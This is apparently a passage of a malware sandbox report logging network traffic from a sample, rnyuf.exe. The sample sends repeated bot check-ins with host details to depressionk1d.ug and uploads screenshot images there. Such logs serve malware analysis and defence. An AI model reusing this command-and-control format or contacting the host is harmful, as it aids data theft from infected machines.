                          Nov 12, 2021 22:23:32.511140108 CET4447OUTData Raw: 85 cd 04 d3 73 49 9a 2e 3b 0e a3 34 ca 5a 43 b0 b9 a3 b5 25 14 00 a6 92 92 97 b5 20 0c d2 e6 9b 49 40 0f cd 14 dc d1 40 0b 45 25 14 00 ec d3 68 a2 80 0a 5a 4a 33 45 c0 29 69 39 a2 81 87 7a 5c d2 51 40 8a d4 51 45 62 6c 7a 8f c0 6f f9 1e 6f 7f ec
                          Data Ascii: sI.;4ZC% I@@E%hZJ3E)i9z\Q@QEblzoo2*dUiS#k{`?dUEbs5IwzxO'XJc5|Uea?U5/F|i(E}-%-[Yu[Yb?GgGG
                          Nov 12, 2021 22:23:32.536317110 CET4457INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:32 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          49192.168.2.449833178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:32.557029963 CET4457OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:32.583277941 CET4458INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:32 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          5192.168.2.449786178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:07.866349936 CET1156OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:07.866434097 CET1156OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:07.866624117 CET1166OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:07.866744995 CET1169OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:07.888674974 CET1170INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:07 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:07.889095068 CET1176OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:07.889967918 CET1186OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:07.890017033 CET1195OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:07.911935091 CET1206OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:07.912420034 CET1211OUTData Raw: 24 f0 cc b2 e9 b1 5d c5 a9 69 f2 49 34 13 5c c1 6a 0c a2 59 a3 89 98 3b 2e 50 2f f0 31 c1 60 70 3a 76 aa e9 a1 dd 3e a7 05 80 96 df cd 9a c8 5f 29 dc 76 88 fc 93 36 0f 1d 76 8f a6 7b f7 ab 17 1e 23 58 b4 0d 2a d2 c2 da cc ea 31 d9 5c 41 35 d9 8e
                          Data Ascii: $]iI4\jY;.P/1`p:v>_)v6v{#X*1\A5A%iTuH@#4?AiDi@`v0wv{c5VIw4[?wWu<j)d2x*pH#SxjKIYuO,Bw@dHjC}&_-r[+YE+9
                          Nov 12, 2021 22:23:07.912513018 CET1222OUTData Raw: 37 92 6e 14 6d 93 19 da ca c1 86 47 a6 54 57 95 86 9a 85 68 4a 5b 26 bf 33 aa ac 5b 83 4b b1 f2 86 68 07 34 bb 29 42 1a fb ab 1e 06 82 52 d1 b4 d2 ec 34 f5 10 94 52 ec 34 bb 0d 3b 05 cf b4 09 ac a7 3f e9 32 ff 00 be 7f 9d 69 93 59 2e 7f d2 65 ff
                          Data Ascii: 7nmGTWhJ[&3[Kh4)BR4R4;?2iY.e|:JC`1O:_UG_8P<otRc"z20S{Wzy(h/q3Gk*e(M8BM\MKqkGpEboAm=x:4wk,
                          Nov 12, 2021 22:23:07.912548065 CET1227OUTData Raw: 40 f9 fd d4 9e 8a 2b e6 80 6b d2 c0 fc 2c 75 3e 08 fc c5 3c 52 67 9a 42 79 a5 ae e3 01 c2 96 90 52 d3 10 51 9a 42 68 a2 e0 28 a5 ed 40 a2 98 80 f5 a7 af 4a 6d 2e 4d 34 26 3f 3c d1 4d 06 94 1c 9a 62 1d 47 4a 41 4b 4c 42 d0 29 05 2d 02 1c 29 45 36
                          Data Ascii: @+k,u><RgByRQBh(@Jm.M4&?<MbGJAKLB)-)E6%4P!iiE0Gd.ifXRx5H~iKM=(hCN(p4NUE-4t!4)D9S(D4hP4)<U"1NRLQK@


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          50192.168.2.449834178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:32.713207006 CET4459OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:32.739675045 CET4459INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:32 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          51192.168.2.449835178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:32.868107080 CET4460OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:32.893281937 CET4460INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:32 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          52192.168.2.449836178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:33.280977011 CET4461OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:33.311841011 CET4500INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:33 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          53192.168.2.449837178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:33.282834053 CET4461OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:33.282988071 CET4461OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:33.283126116 CET4465OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:33.283174038 CET4471OUTData Raw: 9f f8 99 ff 00 24 3e c3 fd cb 3f fd 04 57 ce d8 af a5 7e 31 5a a5 87 c2 85 b3 88 b1 8e 09 6d e2 52 c7 92 17 81 9f 7e 2b e6 ba f1 60 d4 9b 6b b9 ee 34 e2 92 7d 84 c5 18 a5 a2 ac 42 62 ba 0f 0c ff 00 cb d7 fc 03 fa d6 05 6d f8 7a e2 18 0d c0 96 54
                          Data Ascii: $>?W~1ZmR~+`k4}BbmzTvn8Z7cDxAn5u!'Eye|1K\o>Lz]WU-k~/6ectaqZ|g$w/#d>Rc,-a["s(Y?sZv"d!B9Z
                          Nov 12, 2021 22:23:33.283303976 CET4474OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:33.305610895 CET4480OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:33.305664062 CET4485OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:33.305695057 CET4488OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:33.305716991 CET4493OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:33.305747032 CET4497OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:33.305767059 CET4500OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:33.378427029 CET4571INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:33 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:33.421953917 CET4572OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:33.448105097 CET4572INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:33 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          54192.168.2.449838178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:33.587182045 CET4573OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:33.612788916 CET4573INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:33 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
